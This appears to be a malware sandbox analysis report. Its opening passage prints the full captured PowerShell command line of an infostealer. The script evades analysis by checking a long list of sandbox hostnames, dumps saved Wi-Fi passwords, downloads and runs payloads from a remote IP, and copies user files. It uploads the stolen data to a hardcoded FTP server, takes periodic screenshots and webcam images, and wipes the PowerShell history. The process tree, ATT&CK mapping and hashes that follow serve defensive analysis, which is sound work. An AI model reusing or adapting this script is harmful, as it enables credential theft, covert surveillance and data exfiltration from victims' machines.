'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'I'+'8'+'C'+'L'+'E'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'O'+'Y'+'7'+'M'+'H'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'8'+'A'+'S'+'U'+'I'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'W'+'9'+'U'+'O'+'1'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'J'+'F'+'9'+'K'+'A'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'M'+'Y'+'E'+'H'+'D'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'N'+'C'+'A'+'E'+'A'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'O'+'J'+'J'+'8'+'K'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'V'+'9'+'G'+'V'+'Y'+'L') { exit } if ($HNAME2023 -eq 'D'+'O'+'M'+'I'+'C'+'-'+'D'+'E'+'S'+'K'+'T'+'O'+'P') { exit } if ($HNAME2023 -eq 'E'+'A'+'8'+'C'+'2'+'E'+'2'+'A'+'-'+'D'+'0'+'1'+'7'+'-'+'4') { exit } if ($HNAME2023 -eq 'E'+'S'+'P'+'N'+'H'+'O'+'O'+'L') { exit } if ($HNAME2023 -eq 'G'+'A'+'N'+'G'+'I'+'S'+'T'+'A'+'N') { exit } if ($HNAME2023 -eq 'G'+'B'+'Q'+'H'+'U'+'R'+'C'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'A'+'F'+'P'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'X'+'N'+'N'+'I'+'I'+'E') { exit } if ($HNAME2023 -eq 'g'+'Y'+'y'+'Z'+'c'+'9'+'H'+'Z'+'C'+'Y'+'h'+'R'+'L'+'N'+'g') { exit } if ($HNAME2023 -eq 'J'+'B'+'Y'+'Q'+'T'+'Q'+'B'+'O') { exit } if ($HNAME2023 -eq 'J'+'E'+'R'+'R'+'Y'+'-'+'T'+'R'+'U'+'J'+'I'+'L'+'L'+'O') { exit } if ($HNAME2023 -eq 'J'+'O'+'H'+'N'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'J'+'U'+'D'+'E'+'S'+'-'+'D'+'O'+'J'+'O') { exit } if ($HNAME2023 -eq 'J'+'U'+'L'+'I'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'A'+'N'+'T'+'E'+'C'+'H'+'-'+'L'+'L'+'C') { exit } if ($HNAME2023 -eq 'L'+'I'+'S'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'O'+'U'+'I'+'S'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'U'+'C'+'A'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'M'+'I'+'K'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'N'+'E'+'T'+'T'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'E'+'L'+'E'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'X'+'G'+'K'+'K'+'Z'+'C') { exit } if ($HNAME2023 -eq 'P'+'a'+'u'+'l'+' '+'J'+'o'+'n'+'e'+'s') { exit } if ($HNAME2023 -eq 'P'+'C'+'-'+'D'+'A'+'N'+'I'+'E'+'L'+'E') { exit } if ($HNAME2023 -eq 'P'+'R'+'O'+'P'+'E'+'R'+'T'+'Y'+'-'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'Q'+'9'+'I'+'A'+'T'+'R'+'K'+'P'+'R'+'H') { exit } if ($HNAME2023 -eq 'Q'+'a'+'r'+'Z'+'h'+'r'+'d'+'B'+'p'+'j') { exit } if ($HNAME2023 -eq 'R'+'A'+'L'+'P'+'H'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'1') { exit } if ($HNAME2023 -eq 'S'+'t'+'e'+'v'+'e') { exit } if ($HNAME2023 -eq 'S'+'Y'+'K'+'G'+'U'+'I'+'D'+'E'+'-'+'W'+'S'+'1'+'7') { exit } if ($HNAME2023 -eq 'T'+'0'+'0'+'9'+'1'+'7') { exit } if ($HNAME2023 -eq 't'+'e'+'s'+'t'+'4'+'2') { exit } if ($HNAME2023 -eq 'T'+'I'+'Q'+'I'+'Y'+'L'+'A'+'9'+'T'+'W'+'5'+'M') { exit } if ($HNAME2023 -eq 'T'+'M'+'K'+'N'+'G'+'O'+'M'+'U') { exit } if ($HNAME2023 -eq 'T'+'V'+'M'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'V'+'O'+'N'+'R'+'A'+'H'+'E'+'L') { exit } if ($HNAME2023 -eq 'W'+'I'+'L'+'E'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'5'+'E'+'0'+'7'+'C'+'O'+'S'+'9'+'A'+'L'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'D'+'O'+'W'+'S'+'-'+'E'+'E'+'L'+'5'+'3'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'1'+'B'+'H'+'R'+'V'+'P'+'Q'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'2'+'2'+'U'+'R'+'J'+'I'+'B'+'V') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'3'+'F'+'F'+'2'+'I'+'9'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'5'+'J'+'7'+'5'+'D'+'T'+'H'+'H') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'6'+'T'+'U'+'I'+'H'+'N'+'7'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'8'+'M'+'A'+'E'+'I'+'8'+'E'+'4') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'9'+'I'+'O'+'7'+'5'+'S'+'V'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'A'+'M'+'7'+'6'+'H'+'P'+'K'+'2') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'0'+'3'+'L'+'9'+'C'+'E'+'O') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'M'+'S'+'M'+'D'+'8'+'M'+'E') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'U'+'A'+'O'+'K'+'G'+'G'+'1') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'K'+'7'+'V'+'I'+'K'+'4'+'F'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'Q'+'N'+'G'+'K'+'G'+'N'+'5'+'9') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'R'+'S'+'T'+'0'+'E'+'8'+'V'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'U'+'9'+'5'+'1'+'9'+'1'+'I'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'V'+'Q'+'H'+'8'+'6'+'L'+'5'+'D') { exit } if ($HNAME2023 -eq 'W'+'O'+'R'+'K') { exit } if ($HNAME2023 -eq 'X'+'C'+'6'+'4'+'Z'+'B') { exit } if ($HNAME2023 -eq 'X'+'G'+'N'+'S'+'V'+'O'+'D'+'U') { exit } if ($HNAME2023 -eq 'Z'+'E'+'L'+'J'+'A'+'V'+'A') { exit } if ($HNAME2023 -eq '3'+'C'+'E'+'C'+'E'+'F'+'C'+'8'+'3'+'8'+'0'+'6') { exit } if ($HNAME2023 -eq 'C'+'8'+'1'+'F'+'6'+'6'+'C'+'8'+'3'+'8'+'0'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'S'+'L'+'V'+'D'+'7'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'U'+'P'+'F'+'K'+'S'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'P'+'4'+'F'+'I'+'B'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'U'+'J'+'B'+'D'+'2'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'L'+'T'+'M'+'C'+'K'+'L'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'L'+'T'+'W'+'Y'+'Y'+'U') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'A'+'2'+'B'+'Y'+'3'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'B'+'D'+'J'+'J'+'0'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'X'+'P'+'5'+'Y'+'F'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'A'+'U'+'8'+'G'+'J'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'C'+'R'+'B'+'3'+'F'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Y'+'R'+'N'+'O'+'7'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'K'+'Q'+'N'+'D'+'S'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'C'+'N'+'D'+'J'+'W'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'S'+'N'+'L'+'F'+'Z'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'W'+'F'+'R'+'V'+'K'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'L'+'N'+'2'+'V'+'U'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'2'+'Y'+'P'+'F'+'I'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'A'+'0'+'F'+'N'+'V'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'9'+'O'+'A'+'R'+'K'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'5'+'X'+'G'+'G'+'X'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'H'+'U'+'H'+'O'+'T'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'4'+'A'+'C'+'U'+'C'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'N'+'D'+'M'+'I'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'C'+'N'+'6'+'M'+'I'+'O') { exit } if ($HNAME2023 -eq 'F'+'E'+'R'+'R'+'E'+'I'+'R'+'A'+'-'+'W'+'1'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'J'+'C'+'6'+'5'+'0'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'S'+'7'+'P'+'P'+'R'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'W'+'Q'+'5'+'F'+'U'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'H'+'H'+'S'+'Y'+'4'+'R') { exit } if ($HNAME2023 -eq 'A'+'R'+'T'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'0') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'3') { exit } if ($HNAME2023 -eq 'R'+'T'+'T'+'C'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'0'+'1') { exit } if ($HNAME2023 -eq 'A'+'N'+'N'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'H'+'E'+'A'+'F'+'X'+'H'+'S'+'8'+'9'+'7'+'3'+'9'+'8'+'0'+'7') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'F'+'A'+'Q'+'N'+'W'+'5'+'1'+'H'+'S'+'Q'+'0') { exit } cd \"$($env:APPDATA)\" $1=\"1\";$2=\"2\";$3=\"3\" $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation ; $whoami=hostname;mkdir \"Cred\($hey)$whoami\$1-Password-Cookies\";mkdir \"Cred\($hey)$whoami\$3-Files\";mkdir \"Cred\($hey)$whoami\$2-Credentials\" $PublicIP = Invoke-RestMethod -Uri \"http://ipinfo.io/json\" | Select-Object -ExpandProperty ip $Location = Invoke-RestMethod -Uri \"http://ipinfo.io/$PublicIP/json\" | Select-Object -ExpandProperty loc $ComputerName = $env:COMPUTERNAME $Username = $env:USERNAME $RAM = Get-CimInstance -Class Win32_PhysicalMemory | Measure-Object -Property Capacity -Sum | Select-Object -ExpandProperty Sum $RAM = $RAM / 1GB $KeyboardLanguage = (Get-WinUserLanguageList).LanguageTag $GPU = Get-CimInstance -Class Win32_VideoController | Select-Object -ExpandProperty Name $CPU = Get-CimInstance -Class Win32_Processor | Select-Object -ExpandProperty Name $MACAddresses = Get-NetAdapter -Physical | Select-Object -ExpandProperty MacAddress if ($MACAddresses.Count -eq 1) { $MACAddress = $MACAddresses } if ($MACAddresses.Count -gt 1) { $MACAddress = $MACAddresses[0] }else{ $MACAddress = \"MAC Address not found\" } $WIFI = (netsh wlan show profiles) | Select-String \"\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Out-String $OS = Get-CimInstance -ClassName Win32_OperatingSystem $OsName = $OS.Caption $OsBit = $OS.OSArchitecture $Data = \"Public IP: $PublicIP`nLocation: $Location`nComputer Name: $ComputerName`nUsername: $Username`nRAM: $RAM GB`nOS Name: $OsName`nOS Bit: $OsBit`nKeyboard Language: $KeyboardLanguage`nGPU: $GPU`nCPU: $CPU`nMAC Address: $MACAddress`nExtracted WIFI:`n$WIFI\" Add-Content -Path \"$env:APPDATA\Cred\($hey)$whoami\$2-Credentials\Credentials.txt\" -Value $Data cd \"$env:LOCALAPPDATA\";mkdir NewStream $EM4vvrrvMM4Eyvdr4M44E = New-Object System.Net.WebClient $EM4vvrrvMM4Eyvdr4M44E.DownloadFile(\"http://193.42.33.232/meokl/KK2023.zip\",\"$($env:LOCALAPPDATA)\NewStream\KK2023.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:LOCALAPPDATA)\NewStream\KK2023.zip\" \"$($env:LOCALAPPDATA)\NewStream\" cd \"$($env:LOCALAPPDATA)\NewStream\";start Lst.exe Start-Sleep -Seconds 17 Copy-Item -Path \"$($env:LOCALAPPDATA)\NewStream\IMP_Data\*\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\\\" cd \"$($env:APPDATA)\";$hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname;mkdir \"Cred\($hey)$whoami\$3-Files\Desktop\";mkdir \"Cred\($hey)$whoami\$3-Files\Downloads\" Get-Childitem \"$($env:USERPROFILE)\Desktop\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$3-Files\Desktop\" -Force Get-Childitem \"$($env:USERPROFILE)\Downloads\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$3-Files\Downloads\" -Force $y9rd4wMs4OEjv4JA2 = 'ftp://89.116.53.55/' $444Edrv4OdjMsMrE2y = 'u999382941' $Mvr444vEMyMrEErddMd = 'Test1234' $rrvM44E44ryvdMMMEdMv = \"$($env:APPDATA)\Cred\\\" $EM4vvrrvMM4Eyvdr4M44E.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd) $SrcEntries = Get-ChildItem $rrvM44E44ryvdMMMEdMv -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $vEd4rEvE4drEEr4ErM4Ev4ME = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $rEE4EE44v4dMrryMdErdE4v = $folder.Fullname -replace $vEd4rEvE4drEEr4ErM4Ev4ME,$y9rd4wMs4OEjv4JA2 $rEE4EE44v4dMrryMdErdE4v = $rEE4EE44v4dMrryMdErdE4v -replace '\\', '/' try { $EE44dErvEEdvdrvrE4rEMMvvM = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EE44dErvEEdvdrvrE4rEMMvvM.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EE44dErvEEdvdrvrE4rEMMvvM.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $EE44dErvEEdvdrvrE4rEMMvvM.GetResponse(); } catch [Net.WebException] { try { $EyM444EdrvEE4MEM4rrrvr = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EyM444EdrvEE4MEM4rrrvr.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EyM444EdrvEE4MEM4rrrvr.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $EyM444EdrvEE4MEM4rrrvr.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$y9rd4wMs4OEjv4JA2 $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $EM4vvrrvMM4Eyvdr4M44E.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Recurse -Force DEL \"$($env:APPDATA)\Cred\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\NewStream\*\" -Force -Recurse $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname cd \"$($env:APPDATA)\";mkdir Google-Update $EM4vvrrvMM4Eyvdr4M44E.DownloadFile(\"http://193.42.33.232/alheim/Confirm.zip\",\"$($env:APPDATA)\Google-Update\Confirm.zip\") Unzip \"$($env:APPDATA)\Google-Update\Confirm.zip\" \"$($env:APPDATA)\Google-Update\" cd \"$($env:APPDATA)\Google-Update\";.\Confirm.exe cd \"$($env:APPDATA)\";mkdir \"sharing\($hey)$whoami\Ss\";mkdir \"sharing\($hey)$whoami\KeyLogs\";mkdir log_d_information_889176 $EM4vvrrvMM4Eyvdr4M44E.DownloadFile(\"http://193.42.33.232/mrytr/MnMs.zip\",\"$($env:APPDATA)\log_d_information_889176\MnMs.zip\") Unzip \"$($env:APPDATA)\log_d_information_889176\MnMs.zip\" \"$($env:APPDATA)\log_d_information_889176\" [Reflection.Assembly]::LoadWithPartialName(\"S\"+\"y\"+\"s\"+\"t\"+\"e\"+\"m\"+\".\"+\"D\"+\"r\"+\"a\"+\"w\"+\"i\"+\"n\"+\"g\") function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose() } $count_web = (1+ $count_web).ToString('00') $count_sc = (1+ $count_sc).ToString('00') $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080) while ($true) { Start-Sleep -Seconds 600 screenshot $bounds \"$($env:APPDATA)\sharing\($hey)$whoami\Ss\screenshot$count_sc.png\" cd \"$($env:APPDATA)\log_d_information_889176\";.\MnMs.exe;Start-Sleep -Seconds 5;Copy-Item -Path \"dosya.bmp\" -Recurse -Destination \"$env:APPDATA\sharing\($hey)$whoami\Ss\webcam$count_web.bmp\" $y9rd4wMs4OEjv4JA2 = 'ftp://89.116.53.55/' $444Edrv4OdjMsMrE2y = 'u999382941' $Mvr444vEMyMrEErddMd = 'Test1234' $rrvM44E44ryvdMMMEdMv = \"$($env:APPDATA)\sharing\\\" $EM4vvrrvMM4Eyvdr4M44E.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd) $SrcEntries = Get-ChildItem $rrvM44E44ryvdMMMEdMv -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $vEd4rEvE4drEEr4ErM4Ev4ME = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $rEE4EE44v4dMrryMdErdE4v = $folder.Fullname -replace $vEd4rEvE4drEEr4ErM4Ev4ME,$y9rd4wMs4OEjv4JA2 $rEE4EE44v4dMrryMdErdE4v = $rEE4EE44v4dMrryMdErdE4v -replace '\\', '/' try { $EE44dErvEEdvdrvrE4rEMMvvM = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EE44dErvEEdvdrvrE4rEMMvvM.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EE44dErvEEdvdrvrE4rEMMvvM.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $EE44dErvEEdvdrvrE4rEMMvvM.GetResponse(); } catch [Net.WebException] { try { $EyM444EdrvEE4MEM4rrrvr = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EyM444EdrvEE4MEM4rrrvr.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EyM444EdrvEE4MEM4rrrvr.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $EyM444EdrvEE4MEM4rrrvr.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$y9rd4wMs4OEjv4JA2 $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $EM4vvrrvMM4Eyvdr4M44E.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse DEL \"$env:APPDATA\sharing\($hey)$whoami\Ss\*\" -Force -Recurse } } }else{ DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse exit } } "
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3260

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
4⤵
PID:1316

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
4⤵
PID:672

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" wlan show profiles
4⤵
PID:3988

C:\Users\Admin\AppData\Local\NewStream\Lst.exe
"C:\Users\Admin\AppData\Local\NewStream\Lst.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1480

C:\Users\Admin\AppData\Local\NewStream\Lst.exe
"C:\Users\Admin\AppData\Local\NewStream\Lst.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
6⤵
PID:4712

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
4⤵
PID:844

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
4⤵
PID:2640

C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe
"C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1692

C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe
"C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
6⤵
PID:1552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass "cd \"$($env:APPDATA)\";$hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname;mkdir \"$($env:APPDATA)\sharing\($hey)$whoami\KeyLogs\""
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3864

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
7⤵
PID:1412

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ed3c41d0ee936c39fb050d925d5a66ff

SHA1
c66ccd0cff5a6bbd530ca11fe6cf961d0c18f9c0

SHA256
368051acef3684c13182f28a2feb9e2a36c02f17d31b37bb5812679831e795d1

SHA512
a5129201aa5e76b928d87cd21a0627530efa3c427a82ff150f1ebab3cd1ae85c4e36b77ad7886842f89bfbf493327b2b792ecf89ec4e8701f0d25f09795d33ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5becb3178d2998ccd6eb3d8213602ff0

SHA1
4f25233805573e47104fb1ed4b56cfc2da33236f

SHA256
b5a531882b10a9820e08d011e8e3a1b5f4ccc838106a71ee367e204f67f32792

SHA512
9240bd0e666b32cd15b80a319463d8194930474146d9806cd7ca6959b89343732c3f8f9965176f954c942a9276efebcdad0db674a2cd2ac519eb14c31adb9fc2

Download Submit
